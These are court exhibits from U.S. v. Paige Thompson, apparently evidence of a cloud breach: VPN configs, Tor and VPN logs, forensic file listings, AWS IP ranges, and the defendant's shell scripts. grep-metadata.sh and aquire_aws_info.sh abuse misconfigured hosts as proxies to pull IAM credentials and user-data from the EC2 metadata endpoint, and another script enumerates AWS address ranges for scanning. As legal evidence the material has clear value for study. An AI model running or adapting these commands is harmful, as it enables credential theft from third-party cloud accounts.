 4    └#route=$(route -n | grep "${match}" | awk '{print $1}' | shuf | tail -n 1 | tr -d '\n')
 5
 6     echo $1
 7     echo $2
 8     echo $3
 9     echo $4
10     route add default gw  ${route_vpn_gateway}
11
```

pub-ext.conf

```
 1    mode server
 2
 3    tls-server
 4
 5    local pub-ext.seattle1.wa.us.yourstruly.sx
 6
 7    port 1194
 8
 9    #proto tcp-server
10
11    dev PUB-EXT
12
13    dev-type tap
14
15    persist-key
16
17    persist-tun
18
19    pkcs12 /etc/openvpn/server/pub-ext.seattle1.wa.us.yourstruly.sx.p12
20
21    askpass /etc/openvpn/server/pub_ext_p12_pass.txt
22
23    dh /etc/openvpn/server/pub_ext_dh.pem
24
25    tls-auth /etc/openvpn/server/pub_ext_ta.key 0
26
27    client-to-client
28
29    comp-lzo
30
31    ifconfig 10.242.2.1 255.255.255.0
32
33    user nobody
34
35    keepalive 10 120
36
37    verb 1
38
39    client-config-dir /etc/openvpn/server/pub_ext_ccd
40
41    ccd-exclusive
42
```

```
 1   VM_Disks/
 2   ├── [  161415168 Dec  8  2018]  10_4.qcow2
 3   ├── [    6422528 Jan 27  2019]  Clover.qcow2
 4   ├── [ 3149529088 Feb  5  2018]  EdgeRouter-clone.qcow2
 5   ├── [ 3580428288 Jun 16  2019]  Exchange_OWA_nginx_proxy.qcow2
 6   ├── [22900047872 Jul  4  2019]  IPredatorRouter.IPredator-VPN-Router-2-12-2019
 7   ├── [ 3698655232 Jul 13  2019]  IPredatorRouter.qcow2
 8   ├── [107390828544 Feb  1  2019]  MSFT-RAS-Edge.qcow2
 9   ├── [ 2380529664 Jun 16  2019]  MSServersRouter.MSFT-ServerNet-Router-2-12-2019
10   ├── [ 3663003648 Feb 12  2019]  MSServersRouter.qcow2
11   ├── [107390828544 Aug  2  2018]  NixOS.qcow2
12   ├── [  469217280 Aug  8  2010]  SOL_7_1199_DOC.iso
13   ├── [  578662400 Aug  8  2010]  SOL_7_1199_X86.iso
14   ├── [214781394944 Jun 27  2019]  ShellsNew.qcow2
15   ├── [        4096 Jun 29  2019]  Sun Solaris 7.0.1199 [Sun SPARC]
16   └── [         737 Oct 29  2010]  winworldpc.com.txt
17   ├── [24972689408 Jul  4  2019]  Win2k16CertificateAuthority.MSFT-Certificate-Authority-2-12-2019
18   ├── [62773460992 Feb 12  2019]  Win2k16CertificateAuthority.qcow2
19   ├── [98841722880 Jul  4  2019]  Win2k16DomainController.MSFT-Domain-Controller-2-12-2019
20   ├── [35770335232 Feb 12  2019]  Win2k16DomainController.qcow2
21   ├── [13708820480 Mar 29  2019]  Win2k16Edge.MSFT-Exchange-Edge-2016-2-12-2019
22   ├── [49575231488 Feb 12  2019]  Win2k16Edge.qcow2
23   ├── [32716947456 Mar 29  2019]  Win2k16Exchange2016.MSFT-Exchange-Server-2016-2-12-2019
24   ├── [131048210432 Feb 12  2019]  Win2k16Exchange2016.qcow2
25   ├── [41153593344 Jul  4  2019]  Win2k16NetworkServices.MSFT-Network-Services-2-12-2019
26   ├── [106843340800 Feb 12  2019]  Win2k16NetworkServices.qcow2
27   ├── [107040997376 Feb 12  2019]  Win2k16SQLServer.qcow2
28   ├── [49715019776 Nov  3  2018]  Win2k16Sharepoint.qcow2
29   ├── [10220732416 Nov  2  2017]  Windows_Server_2016.qcow2
30   ├── [11121524736 Dec 12  2017]  Windows_Server_2016_Activated.qcow2
31   ├── [     198208 Sep 15  2018]  Windows_Server_2016_Activated.sysprep
32   ├── [29364994560 Feb  2  2019]  Workstation.ova
33   ├── [  168361984 Dec 27  2018]  blah.qcow2
34   ├── [   11272192 Dec  8  2018]  clover.qcow2
35   ├── [  314834944 Nov 23  2018]  macos9.qcow2
36   ├── [10739318784 Aug  2  2018]  nixos-test.qcow2
37   ├── [     198208 Aug  2  2018]  nixos.qcow2
38   ├── [        4096 Feb 12  2019]  old
39   ├── [ 3058040832 Nov 23  2018]  osx.qcow2
40   ├── [  575471616 Dec  8  2018]  osx_10_4.qcow2
41   ├── [ 1842937856 Dec  9  2018]  osx_10_4_try2.qcow2
42   ├── [27587903488 Dec  8  2018]  osx_postinstall.qcow2
43   ├── [        4096 Feb  9  2019]  ppc64
44   │   ├── [     131072 Nov 28  2015]  XFX.R9390X.8192.150527.rom
45   │   ├── [     198208 Dec  7  2018]  disk.qcow2
46   │   ├── [     524288 Dec  7  2018]  emuofw.rom
47   │   ├── [        402 Dec  7  2018]  initrd.gz
48   │   ├── [          0 Dec  7  2018]  installed
49   │   ├── [   42577920 Nov  7  2018]  mini.iso
50   │   ├── [       3430 Dec  7  2018]  ppc64.sh
51   │   ├── [     575564 Dec  7  2018]  qprepofw.rom
52   │   └── [   16505264 Dec  7  2018]  vmlinux
53   ├── [  647471104 Feb 20  2010]  solaris_7_1199_sparc.iso
54   ├── [     198208 Jun 29  2019]  solaris_7_sparc64.qcow2
55   ├── [        298 Jun 29  2019]  test.ini
56   ├── [21478375424 Dec 12  2017]  win2k12r2.qcow2
57   └── [       1031 Apr 30  2011]  winworldpc.com.txt
58
59   3 directories, 53 files
```

1  Apr 17 08:34:34 pub-ext IPredator[575]: PUSH: Received control message:
   'PUSH_REPLY,route 46.246.62.2 255.255.255.255 net_gateway,route-gateway
   46.246.62.1,redirect-gateway def1,topology subnet,dhcp-option DOMAIN
   ipredator.se,dhcp-option DNS 46.246.46.46,dhcp-option DNS 194.132.32.23,ip-win32
   dynamic,ping 10,ping-restart 60,explicit-exit-notify 3,sndbuf 0,rcvbuf 0,peer-id
   0,ifconfig 46.246.62.74 255.255.255.0'
2  Apr 17 08:34:34 pub-ext IPredator[575]: /sbin/ip addr add dev IPREDATOR
   46.246.62.74/24 broadcast 46.246.62.255
3  Apr 19 16:52:48 pub-ext IPredator[575]: /sbin/ip addr del dev IPREDATOR
   46.246.62.74/24

```
 1  Apr 19 17:39:09 pub-ext IPredator[5121]: PUSH: Received control message: 'PUSH_REPLY,route 46.246.35.2 255.255.255.255
    net_gateway,route-gateway 46.246.35.1,redirect-gateway def1,topology subnet,dhcp-option DOMAIN ipredator.se,dhcp-option DNS
    46.246.46.46,dhcp-option DNS 194.132.32.23,ip-win32 dynamic,ping 10,ping-restart 60,explicit-exit-notify 3,sndbuf 0,rcvbuf 0,peer-id
    11,ifconfig 46.246.35.103 255.255.255.0'
 2  Apr 19 17:39:09 pub-ext IPredator[5121]: /sbin/ip addr add dev IPREDATOR 46.246.35.103/24 broadcast 46.246.35.255
 3  Apr 19 17:39:36 pub-ext Tor[5082]: Your IP address seems to have changed to 46.246.35.103 (METHOD=INTERFACE). Updating.
 4  Apr 19 17:39:36 pub-ext Tor[5082]: Our IP Address has changed from 46.246.44.141 to 46.246.35.103; rebuilding descriptor (source:
    METHOD=INTERFACE).
 5  Apr 19 17:54:21 pub-ext Tor[5474]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
 6  Apr 19 17:55:55 pub-ext Tor[5500]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
 7  Apr 19 17:56:50 pub-ext Tor[5527]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
 8  Apr 19 18:06:49 pub-ext Tor[5618]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
 9  Apr 19 18:12:40 pub-ext Tor[5660]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
10  Apr 19 18:24:39 pub-ext Tor[5765]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
11  Apr 19 18:28:09 pub-ext Tor[5802]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
12  Apr 19 18:30:59 pub-ext Tor[5940]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
13  Apr 19 18:33:45 pub-ext Tor[5980]: Now checking whether ORPort 46.246.35.103:443 is reachable... (this may take up to 20 minutes --
    look for log messages indicating success)
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 623
Admitted_____

```
1  May 25 12:20:33 pub-ext IPredator[2866]: PUSH: Received control message: 'PUSH_REPLY,route 46.246.62.130
   255.255.255.255 net_gateway,route-gateway 46.246.62.1,redirect-gateway def1,topology subnet,dhcp-option DOMAIN
   ipredator.se,dhcp-option DNS 46.246.46.46,dhcp-option DNS 194.132.32.23,ip-win32 dynamic,ping 10,ping-restart
   60,explicit-exit-notify 3,sndbuf 0,rcvbuf 0,peer-id 11,ifconfig 46.246.62.176 255.255.255.0'
2  May 25 12:20:34 pub-ext IPredator[2866]: /sbin/ip addr add dev IPREDATOR 46.246.62.176/24 broadcast 46.246.62.255
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 624
Admitted_____

spool.sh ✖

```bash
#!/bin/bash

name=$(echo $1 | tr '/' '_')
python2.7 -c 'import sys; import ipaddress; print "\n".join(map(str,
ipaddress.ip_network(unicode("'$1'")).hosts()))' | xz -9 > all/$name.xz
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 641
Admitted_____



1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan

83 files, 17 dir.

| Name | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector | Metadata | Device type |
|---|---|---|---|---|---|---|---|---|---|---|
| .. = aws_hacking_shit (5,549,429) | existing | | 109 GB | 07/10/2019 09:42... | 07/02/2019 17:30... | 07/19/2019 06:21... | rwxrwxrwx | 7,044,587... | | |
| . = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... | | |
| events.pcap | existing | pcap | 10.6 MB | 07/10/2019 10:18... | 03/14/2019 05:59... | 07/19/2019 06:24... | Crwxrwxrwx | 34,353,032 | | |
| fuckyoutoo | existing | | 32 B | 07/10/2019 10:16... | 03/22/2019 02:31... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | | |
| fuseos-dev-compute.ec2_instances.us-east-1 | existing | us-east... | 1.0 MB | 07/10/2019 10:17... | 03/05/2019 13:57... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,264 | | |
| gay | existing | | 0.9 KB | 07/10/2019 10:17... | 04/02/2019 04:51... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | | |
| globalgarner.in.env | existing | env | 1.2 KB | 07/10/2019 10:17... | 03/14/2019 11:57... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,666... | | |
| grep-metadata-ssl.sh | existing, already viewed | sh | 175 B | 07/10/2019 10:16... | 03/20/2019 19:10... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | | |
| grep-metadata.sh | existing, already viewed | sh | 170 B | 07/10/2019 10:16... | 03/20/2019 19:13... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | | |
| https_ports.txt | existing | txt | 9 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,672... | | |
| id | existing | | 0.6 KB | 07/10/2019 10:17... | 03/28/2019 02:56... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,665... | | |
| infobloxcto.docker.repos | existing | repos | 2.9 KB | 07/10/2019 10:16... | 03/14/2019 08:29... | 07/19/2019 06:24... | Crwxrwxrwx | 7,053,619... | | |
| infobloxctodockerstuff.sh | existing | sh | 4.4 KB | 07/10/2019 10:17... | 03/14/2019 08:25... | 07/19/2019 06:24... | Crwxrwxrwx | 28,331,680 | | |
| ip-ranges.json | existing, already viewed | json | 197 KB | 07/10/2019 10:16... | 03/01/2019 10:21... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,368 | | |
| limits.conf | existing | ascii_u... | 268 B | 07/10/2019 10:16... | 04/06/2019 18:05... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... | | |
| mega_metadata.txt | existing | txt | 46.6 KB | 07/10/2019 10:17... | 04/02/2019 07:40... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,808 | | |
| metadata.scanner.joblog | existing | joblog | 1.1 GB | 07/10/2019 10:17... | 03/14/2019 17:30... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,008 | | |
| metadata_to_date_03_19_19 | existing | | 29.7 KB | 07/10/2019 10:16... | 03/19/2019 04:35... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,424 | | |
| miner.tar | existing | tar | 13.4 MB | 07/10/2019 10:17... | 04/04/2019 15:42... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,832 | | |
| nano | existing, already viewed | | 0 B | 07/10/2019 10:17... | 03/08/2019 18:39... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,709... | | |
| new-ec2-credentials-describe-instances | existing | | 115 KB | 07/10/2019 10:16... | 03/04/2019 10:08... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,328 | | |
| new_all.xz | existing | xz | 141 MB | 07/10/2019 10:16... | 03/19/2019 00:58... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,617... | | |
| new_all2.xz | existing | xz | 28.1 MB | 07/10/2019 10:16... | 04/06/2019 16:33... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... | | |
| pass | existing | | 17 B | 07/10/2019 10:19... | 03/14/2019 07:13... | 07/19/2019 06:24... | rwxrwxrwx | 11,675,07... | | |

Partition | File | Preview | Details | Gallery | Calendar | Legend | Raw | Text

Selected: 1 file (197 KB)

```
{
  "syncToken": "1551463284",
  "createDate": "2019-03-01-18-01-24",
  "prefixes": [
    {
      "ip_prefix": "18.208.0.0/13",
      "region": "us-east-1",
      "service": "AMAZON"
    },
    {
      "ip_prefix": "52.95.245.0/24",
      "region": "us-east-1",
      "service": "AMAZON"
    },
    {
      "ip_prefix": "52.194.0.0/15",
      "region": "ap-northeast-1",
      "service": "AMAZON"
    },
    {
      "ip_prefix": "54.155.0.0/16",
      "region": "eu-west-1",
      "service": "AMAZON"
    },
```

```
1   {
2       "syncToken": "1551463284",
3       "createDate": "2019-03-01-18-01-24",
4       "prefixes": [
5           {
6               "ip_prefix": "18.208.0.0/13",
7               "region": "us-east-1",
8               "service": "AMAZON"
9           },
10          {
11              "ip_prefix": "52.95.245.0/24",
12              "region": "us-east-1",
13              "service": "AMAZON"
14          },
15          {
16              "ip_prefix": "52.194.0.0/15",
17              "region": "ap-northeast-1",
18              "service": "AMAZON"
19          },
20          {
21              "ip_prefix": "54.155.0.0/16",
22              "region": "eu-west-1",
23              "service": "AMAZON"
24          },
25          {
26              "ip_prefix": "54.196.0.0/15",
27              "region": "us-east-1",
28              "service": "AMAZON"
29          },
30          {
31              "ip_prefix": "52.94.22.0/24",
32              "region": "us-gov-east-1",
33              "service": "AMAZON"
34          },
35          {
36              "ip_prefix": "52.95.255.112/28",
37              "region": "us-west-2",
38              "service": "AMAZON"
39          },
```

1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan\all

343 files, 0 dir.

| Name ▲ | Description | Type | Size | Created | Modified | Record changed | Attr. | 1st sector | Metadata | Device ty |
|---|---|---|---|---|---|---|---|---|---|---|
| .. = aws_scan (3,868,755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... | | |
| all | existing, already viewed | | 9.4 MB | 07/10/2019 10:16... | 05/29/2019 00:52... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,619... | | |
| 100.20.0.0_14.xz | existing, already viewed | xz | 61.1 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,489... | | |
| 100.24.0.0_13.xz | existing | xz | 110 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,032... | | |
| 103.4.8.0_21.xz | existing | xz | 0.8 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,627... | | |
| 107.20.0.0_14.xz | existing | xz | 57.4 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,786,620... | | |
| 108.128.0.0_13.xz | existing | xz | 99.7 KB | 07/10/2019 10:16... | 04/06/2019 12:41... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,554... | | |
| 122.248.192.0_18.xz | existing | xz | 4.4 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,816,973... | | |
| 13.112.0.0_14.xz | existing | xz | 63.1 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,370... | | |
| 13.124.0.0_16.xz | existing | xz | 20.6 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,552... | | |
| 13.125.0.0_16.xz | existing | xz | 20.6 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,786,620... | | |
| 13.126.0.0_15.xz | existing | xz | 40.2 KB | 07/10/2019 10:16... | 04/06/2019 12:41... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... | | |
| 13.208.0.0_16.xz | existing | xz | 24.0 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,816,573... | | |
| 13.209.0.0_16.xz | existing | xz | 21.4 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,553... | | |
| 13.210.0.0_15.xz | existing | xz | 43.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,786,620... | | |
| 13.228.0.0_15.xz | existing | xz | 44.5 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,818,990... | | |
| 13.230.0.0_15.xz | existing | xz | 41.6 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,554... | | |
| 13.232.0.0_14.xz | existing | xz | 60.8 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,494... | | |
| 13.236.0.0_14.xz | existing | xz | 70.7 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,552... | | |
| 13.250.0.0_15.xz | existing | xz | 40.6 KB | 07/10/2019 10:16... | 04/06/2019 12:41... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,559... | | |
| 13.48.0.0_15.xz | existing | xz | 28.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,238... | | |
| 13.52.0.0_16.xz | existing | xz | 22.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,556... | | |
| 13.53.0.0_16.xz | existing | xz | 22.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,375... | | |
| 13.54.0.0_15.xz | existing | xz | 31.6 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,816,973... | | |
| 13.56.0.0_16.xz | existing | xz | 22.1 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,554... | | |
| 13.57.0.0_16.xz | existing | xz | 22.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... | | |
| 13.58.0.0_15.xz | existing | xz | 28.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,375... | | |
| 140.179.0.0_16.xz | existing | xz | 19.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,370... | | |
| 15.164.0.0_15.xz | existing | xz | 39.4 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,554... | | |
| 15.177.0.0_18.xz | existing | xz | 5.0 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,032... | | |
| 157.175.0.0_16.xz | existing | xz | 17.1 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,241... | | |
| 160.1.0.0_16.xz | existing | xz | 19.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,552... | | |
| 162.213.232.0_24.xz | existing | xz | 304 B | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,625... | | |
| 162.250.236.0_24.xz | existing | xz | 308 B | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,625... | | |
| 174.129.0.0_16.xz | existing | xz | 17.3 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,553... | | |
| 175.41.128.0_18.xz | existing | xz | 5.1 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,807,065... | | |
| 175.41.192.0_18.xz | existing | xz | 5.6 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,807,065... | | |
| 176.32.64.0_19.xz | existing | xz | 2.4 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,279,157... | | |
| 176.34.0.0_19.xz | existing | xz | 2.9 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,817,099... | | |
| 176.34.128.0_17.xz | existing | xz | 8.5 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,493... | | |
| 176.34.32.0_19.xz | existing | xz | 2.5 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,807,013... | | |
| 176.34.64.0_18.xz | existing | xz | 5.7 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,560... | | |
| 177.71.128.0_17.xz | existing | xz | 10.9 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,497... | | |
| 18.130.0.0_16.xz | existing | xz | 23.1 KB | 07/10/2019 10:16... | 04/06/2019 12:41... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,559... | | |
| 18.136.0.0_16.xz | existing | xz | 22.9 KB | 07/10/2019 10:16... | 04/06/2019 12:41... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,559... | | |
| 18.138.0.0_15.xz | existing | xz | 42.5 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,555... | | |
| 18.144.0.0_15.xz | existing | xz | 41.1 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,027... | | |
| 18.153.0.0_16.xz | existing | xz | 22.2 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,493... | | |
| 18.175.0.0_16.xz | existing | xz | 20.6 KB | 07/10/2019 10:16... | 04/06/2019 12:40... | 07/19/2019 06:24... | rwxrwxrwx | 6,819,555... | | |

1b52-md126-luksopen, Vol...

\home\erratic\aws_hacking_shit\aws_scan

| Name ▾ | Description | Type | Size | Created | Modified ▲ | Record changed | Attr. | 1st sector | Me |
|---|---|---|---|---|---|---|---|---|---|
| ⬛.. = aws_hacking_shit (5.549.429) | existing | | 109 GB | 07/10/2019 09:42... | 07/02/2019 17:30... | 07/19/2019 06:21... | rwxrwxrwx | 7,044,587... | |
| ⬛.. = aws_scan (3.868.755) | existing | | 17.6 GB | 07/10/2019 10:05... | 05/29/2019 01:10... | 07/19/2019 06:22... | rwxrwxrwx | 5,222,080... | |
| ⬜ nano | existing, already viewed | | 0 B | 07/10/2019 10:17... | 03/08/2019 18:39... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,709... | |
| ⬜ miner.tar | existing | tar | 13.4 MB | 07/10/2019 10:17... | 04/04/2019 15:42... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,832 | |
| ⬜ metadata_to_date_03_19_19 | existing | | 29.7 MB | 07/10/2019 10:16... | 03/19/2019 04:35... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,424 | |
| ⬜ metadata.scanner.joblog | existing | tsv | 1.1 GB | 07/10/2019 10:17... | 03/14/2019 17:30... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,008 | |
| ⬜ mega_metadata.txt | existing, already viewed | txt | 46.6 KB | 07/10/2019 10:17... | 04/02/2019 07:40... | 07/19/2019 06:24... | Crwxrwxrwx | 20,838,808 | |
| ⬜ limits.conf | existing | ascii_u... | 268 B | 07/10/2019 10:16... | 04/06/2019 18:05... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,628... | |
| ⬜ ip-ranges.json | existing, already viewed | json | 197 KB | 07/10/2019 10:16... | 03/01/2019 10:21... | 07/19/2019 06:24... | Crwxrwxrwx | 26,332,368 | |
| ⬜ infobloxctodockerstuff.sh | existing | sh | 4.4 KB | 07/10/2019 10:17... | 03/14/2019 08:25... | 07/19/2019 06:24... | Crwxrwxrwx | 28,331,680 | |
| ⬜ infobloxcto.docker.repos | existing | repos | 2.9 KB | 07/10/2019 10:16... | 03/14/2019 08:29... | 07/19/2019 06:24... | Crwxrwxrwx | 7,053,619... | |
| ⬜ id | existing | | 0.6 KB | 07/10/2019 10:17... | 03/28/2019 02:56... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,665... | |
| ⬜ https_ports.txt | existing, already viewed | txt | 9 B | 07/10/2019 10:17... | 03/04/2019 00:37... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,672... | |
| ⬜ grep-metadata.sh | existing, already viewed | sh | 170 B | 07/10/2019 10:16... | 03/20/2019 19:13... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | |
| ⬜ grep-metadata-ssl.sh | existing, already viewed | sh | 175 B | 07/10/2019 10:16... | 03/20/2019 19:10... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | |
| ⬜ globalgarner.in.env | existing | env | 1.2 KB | 07/10/2019 10:17... | 03/14/2019 11:57... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,666... | |
| ⬜ gay | existing | | 0.9 KB | 07/10/2019 10:17... | 04/02/2019 04:51... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | |
| ⬜ fuseos-dev-compute.ec2_instances.us-east-1 | existing | us-east... | 1.0 MB | 07/10/2019 10:17... | 03/05/2019 13:57... | 07/19/2019 06:24... | Crwxrwxrwx | 20,839,264 | |
| ⬜ fuckyoutoo | existing | | 32 B | 07/10/2019 10:16... | 03/22/2019 02:31... | 07/19/2019 06:24... | rwxrwxrwx | 7,053,641... | |

⚬ Partition   ⬜ File   ◈ Preview   ⬚ Details   ⬚ Gallery   ⬚ Calendar   ⬚ Legend   ¦ Raw  Text  ▾  ⚟ ◁ ⬚ ◇

#!/bin/bash

grep -r "ami-id" metadata/ | sed 's/:ami-id//g' | grep -v ":443" | parallel --tag curl -Lsk --fail --proxy http://{} http://169.254.169.254/latest/meta-data

grep-metadata.sh

```bash
#!/bin/bash

grep -r "ami-id" metadata/ | sed 's/:ami-id//g' | grep -v ":443" | parallel --tag curl -Lsk --fail --proxy http://{} http://169.254.169.254/latest/meta-data
```

642-002



U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 670
Admitted_____

aquire_aws_info.sh

```bash
1    #!/bin/bash
2
3    # How to use:
4    #grep -r ami-id | sed 's/:ami-id//g' | sed -e 's/<[^>]*>//g' | sed 's/.*:443/https\:\/\/\0/g' | sed '/.*:443/!
     s/.*/http:\/\/\0/g' | parallel --tag curl --retry 2 --connect-timeout 1 -m 5 -Lsk --fail --proxy-insecure --proxy {}
     http://169.254.169.254/latest/meta-data/iam/security-credentials '&&' echo -e '"\n"' | tr '\t' ' ' | sed -e 's/<[^>]*>//g' |
     grep "." | awk 'NF==2 {print $0}'| parallel --colsep ' ' ../../aquire_aws_info.sh {1} {2}
5
6    export regions="eu-north-1
7    ap-south-1
8    eu-west-3
9    eu-west-2
10   eu-west-1
11   ap-northeast-2
12   ap-northeast-1
13   sa-east-1
14   ca-central-1
15   ap-southeast-1
16   ap-southeast-2
17   eu-central-1
18   us-east-1
19   us-east-2
20   us-west-1
21   us-west-2"
22
23   export output=$(echo $1 | tr '/' ' ' | awk '{print $2}')
24   export awsopts="--debug --cli-connect-timeout 5"
25
26   # Grab user-data
27   curl -Lsk --connect-timeout 1 -m 5 --retry 2 --fail --proxy-insecure --proxy "${1}" "http://169.254.169.254/latest/user-data/"
     > ../collected/user-data/$output
28
29   # Get security credentials
30   content=$(curl -Lsk --connect-timeout 1 -m 5 --retry 2 --fail --proxy-insecure --proxy "${1}"
     "http://169.254.169.254/latest/meta-data/iam/security-credentials/${2}")
31   eval `echo $content | awssession.sh`
32
